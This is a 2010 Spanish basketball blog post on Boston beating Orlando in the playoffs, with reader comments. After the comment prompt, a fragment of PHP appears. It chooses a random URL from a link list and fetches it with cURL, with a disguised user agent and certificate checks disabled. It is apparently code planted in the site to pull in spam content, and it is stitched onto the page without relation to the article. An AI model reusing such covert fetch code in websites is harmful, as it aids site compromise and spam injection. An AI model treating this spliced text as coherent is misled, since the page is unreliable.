Playoffs 2009/2010: El penitente no pasará

23 de May de 2010 por TheDeerHunter

“The most disappointing to me was that I didn’t have our team better ready to play. It starts with me. It’s my job. I’m the coach of this team.”

Resulta admirable que Stan Van Gundy diera la cara anoche, asumiendo quizás mayor cota de culpa incluso de la que le corresponde. Sus hombres dieron una imagen lamentable. Una rendición en toda regla. Los Celtics han aniquilado por completa la resistencia mental de Orlando y lamentablemente la serie terminó en el partido #2. ¿Cómo prepararán el último partido de la serie? Pues seguramente haciendo la reserva de las vacaciones.

Un equipo acostumbrado a anotar más de 100 puntos por partido con la gorra, que se había paseado en las dos primeras rondas. Anoche alcanzaron los 71 y gracias, que los Celtics aflojaron la tenaza en el último cuarto. No es de recibo que la pareja Dwight Howard-Rashard Lewis logren anotar la impresionante cifra de 11 puntos entre ambos.

Ahora, que tiene tela darles minutos precisamente ayer a Ryan Anderson o a Brandon Bass. El partido había terminado en el 2º cuarto.

1986. Año mágico para los Celtics. Larry Bird ganaba su último campeonato justo cuando nacieron Rajon Rondo y Glen Davis, los ejecutores de anoche. Llevan a su equipo en bandeja de plata hasta su segunda final en 3 años. El equipo de acabados ganando asombrosamente fácil, desde una defensa que marea. Los cantos al eterno rival ya se entonan en las gradas del Boston Garden.

MVP: Los Celtics son un “todos a una”. Ahí radica realmente su fuerza. Hoy no destacaremos a nadie sobre el resto. Destacamos al equipo que funciona como un enjambre.

La Sorpresa: Muchos minutos del último cuarto para Finley, Marquis Daniels, Nate Robinson y Shelden Williams para que no se diga que no han participado del título.

La decepción: El actual subcampeón rindiéndose de esa manera. En mi opinión las dos cabezas visibles del descalabro son Van Gundy y Rashard Lewis por ese orden, aunque como líder Dwight Howard no debería irse de rositas en este asunto.

El mayor esfuerzo en vano: Nelson, Carter y Pietrus fueron los únicos del “equipazo” que lograron alcanzar las dobles figuras.

Comenta

11 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Decepcionantemente decepcionante…

      Citar

  2. Chris dice:
    #2

    ¿Van Gundy a buscarse nuevo equipo?

      Citar

  3. Love Denise dice:
    #3

    No encuentro la explicación para comprender este 0-3. Quizás, tras el primer partido se ha creado mal ambiente en el vestuario de Orlando, no sé.. A un equipo no se le puede olvidar tan pronto como se juega a baloncesto. Que sí, que los Celtics defienden bien, pero no como para dejar a este equipazo en 70 puntos y ganarles tres partidos seguidos, y más con un Garnett que no es ni la sombra de lo que fue y otros jugadores como Rondo o Allen que lo han hecho bien pero no a su mejor nivel, vamos que tampoco se han salido en la eliminatoria.
    Supongo que es el fin de VGundy, en particular, yo no tocaría nada del equipo (me refiero a los jugadores), es un autentico equipazo, aunque a Lewis habría que darle un toque de atención, pero a pesar de la mierda que ha hecho durante la temporada tampoco lo pondría en el mercado. Haciendo balance ya, muy bien Nelson, Carter (que hizo olvidar al turco) y Redick. Los 3 que para mí mejor rendimiento han dado teniendo en cuenta su nivel, y notable temporada para Barnes, Pietrus y Anderson (cuando Van Gundy le ha dejado jugar). Espero que el proximo entrenador no utilice a Howard como mero pivot que se limita a bloquear tipo Jason Collins y similares…

      Citar

  4. mmmm dice:
    #4

    Juasjuasjuas… No hace tanto que oía:

    “Esto va a ser un paseo para Orlando bla bla bla…”

    BEAT L.A!

      Citar

  5. Jabho dice:
    #5

    Orlando dejó ayer una muy mala imagen, de muy poquita dureza mental. Lewis buffff…. Pero vamos, que a mi ya me dejaron una imagen similar el año pasado contra LAL. Yo si me cargaría a Van Gundy pero justo después intentaría tradear a Lewis. El resto me dan más credibilidad.

    Ver a los Celtics 20 arriba en el 2º cuarto, 2-0 la eliminatoría y todo el campo gritando “defense” moooolaaaaa… Orgullo céltico o no es la clave de este equipo.

    Howard debe mejorar mucho para ser más dominante.

    A ver si los Suns dan algo más de si, que esto esta visto para sentencia (aunque no es descartable que alguno ganen los Magic)

      Citar

  6. Love Denise dice:
    #6

    @ mmmm: Qué facil es hablar cuando esto va 0-3 eh??, que facil es quedarse callado todo el año y ahora ser el mayor fan de Boston en??? no había leido ningun comentario tuyo hasta ahora, por qué será???

      Citar

  7. Jabho dice:
    #7

    En cierta forma llevas razón Love, aparezco poco por aqui ultimamente debido a que tengo poco tiempo… Mucho menos de lo que me gustaría

    Un post mío de antes de empezar la temporada

    http://blog.tjnba.com/2009/10/12/boston-celtics-el-retorno-del-jedi/

    Confiar llevo todo el año confiando en ellos, porque la clave con equipos tan veteranos es llegar bien a PO. Han llegado bien y son tan competitivos como cualquiera. Sinceramente en el caso de los Celtics (como en otro tiempo fue para los Spurs o los Pistons) la regular no es demasiado significativa, la clave es que se vena bien en abril y ahí son muy, muy duros.

      Citar

  8. TheDeerHunter dice:
    #8

    Jabho… LDenise no te decía nada a ti. No creo que hubiera nada que reprochar a tu comentario.

    y al resto, haya paz…

      Citar

  9. Love Denise dice:
    #9

    jabho, para ti no iba mi anterior comentario, creo que lo dejé bien clarito salvo que ambos seais la misma persona.

      Citar

  10. mmmm dice:
    #10

    @ Love Denise, mi intencion no era ofender ni nada de eso, pero ahora que lo dices si que habia comentado previamente, en concreto ya en la entrada de analisis de esta eliminatoria, en la que tu decias que estas finales iban a ser cortas (porque iba a arrasar Orlando, se entiende), y yo dije, como otro comentario, que no me importaria apostar a favor de los Celtics. Tampoco me referia a ti concretamente cuando hablaba de que muchos decian que Orlando iba a ganar, porque la mayoria de analistas y gente entendida (seguramente mucho mas que yo) daban como victoria casi segura a Orlando. Y luego tambien comente en el 1r partido creo, hablando del arbitraje. En fin, da igual.
    Ya se que es muy facil hablar con un 3-0, pero yo confiaba desde el principio de la serie (reconozco que no desde el principio de los playoffs) en que los Celtics pudieran ganar, basicamente porque es mi equipo de toda la vida.

    Ya se que mi comentario ha podido sonar un poco tocapelotas pero no era mi intencion para nada. Te pido disculpas igualmente.

      Citar

  11. Love Denise dice:
    #11

    ok mmmm, tampoco hace falta pedir disculpas, quizas tambien ha sido un error mio el tomar en serio tu comentario. Olvidado:)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>